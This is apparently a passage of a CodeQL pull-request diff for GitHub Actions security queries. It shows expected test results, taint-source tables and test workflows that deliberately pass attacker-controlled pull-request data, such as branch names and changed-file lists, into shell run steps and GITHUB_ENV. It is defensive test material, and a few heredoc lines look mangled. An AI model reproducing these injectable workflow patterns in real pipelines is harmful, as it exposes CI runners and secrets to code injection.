Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | -| 
.github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | -| 
.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | -| 
.github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| 
.github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | -| Rishabh510/Path-lister-action | * | output.paths | filename | manual | -| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | -| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | -| ab185508/file-type-finder | * | output.names | filename | manual | -| ab185508/file-type-finder | * | output.paths | filename | manual | -| ahmadnassri/action-changed-files | * | output.files | filename | manual | -| ahmadnassri/action-changed-files | * | output.json | json | manual | -| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | -| amannn/action-semantic-pull-request | * | output.error_message | text | manual | -| ankitjain28may/list-files-in-pr | * | 
output.pullRequestFiles | filename | manual | -| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | -| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | -| jitterbit/get-changed-files | * | output.added | filename | manual | -| jitterbit/get-changed-files | * | output.added_modified | filename | manual | -| jitterbit/get-changed-files | * | output.all | filename | manual | -| jitterbit/get-changed-files | * | output.deleted | filename | manual | -| jitterbit/get-changed-files | * | output.modified | filename | manual | -| jitterbit/get-changed-files | * | output.removed | filename | manual | -| jitterbit/get-changed-files | * | output.renamed | filename | manual | -| jsmith/changes-since-last-tag | * | output.added | filename | manual | -| jsmith/changes-since-last-tag | * | output.files | filename | manual | -| jsmith/changes-since-last-tag | * | output.modified | filename | manual | -| jsmith/changes-since-last-tag | * | output.removed | filename | manual | -| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | -| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | -| knu/changed-files | * | output.changed_files | filename | manual | -| knu/changed-files | * | output.changed_files_json | filename | manual | -| knu/changed-files | * | output.matched_files | filename | manual | -| knu/changed-files | * | output.matched_files_json | filename | manual | -| lots0logs/gh-action-get-changed-files | 
* | output.added | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | -| marocchino/on_artifact | * | output.* | artifact | manual | -| martinhaintz/ga-file-list | * | output.file_names | filename | manual | -| martinhaintz/ga-file-list | * | output.files | filename | manual | -| peter-murray/issue-body-parser-action | * | output.* | text | manual | -| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | -| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | -| the-coding-turtle/ga-file-list | * | output.files | filename | manual | -| tj-actions/branch-names | * | output.current_branch | branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| trilom/file-changes-action | * | output.files | filename | manual | -| trilom/file-changes-action | * | output.files_added | filename | manual | -| trilom/file-changes-action | * | output.files_modified | filename | manual | -| trilom/file-changes-action | * | output.files_removed | filename | manual | -| tzkhan/pr-update-action | * | output.headMatch | branch | manual | -| w3f/action-find-old-files | * | output.files | filename | manual | -| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| yumemi-inc/changed-files | * | output.files | filename | manual | -summaries -| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | -| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | -| Reedyuk/read-properties | * | artifact | 
output.value | taint | manual | -| SebRollen/toml-action | * | artifact | output.value | taint | manual | -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| andstor/file-reader-action | * | artifact | output.contents | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| 
aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bfren/read-file | * | artifact | output.contents | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| christian-draeger/read-properties | * | artifact | output.* | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| dangdennis/toml-action | * | artifact | output.value | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| 
frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| gagle/package-version | * | artifact | output.version | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| 
hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | -| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | -| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| juliangruber/read-file-action | * | artifact | output.content | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| komorebitech/read-files-action | * | artifact | output.content | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| kurt-code/gha-properties | * | artifact | output.* | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | 
manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| madhead/read-java-properties | * | artifact | output.* | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | -| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | -| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | -| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | -| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| 
shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| simonblund/version-reader | * | artifact | output.version | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv1 -| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep 
-E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | -| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR6 | ${ISSUE_BODY3} | VAR6=${ISSUE_BODY3} | -| VAR7 | Hello\nWorld | VAR7<> $GITHUB_ENV + + - name: Test formalities + run: | + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 000000000000..c91b68f6b875 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml 
@@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3db6902ad2f6..d9cbfe804ae8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,8 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9f3e500817a4..eb9fcc2418ab 100644 
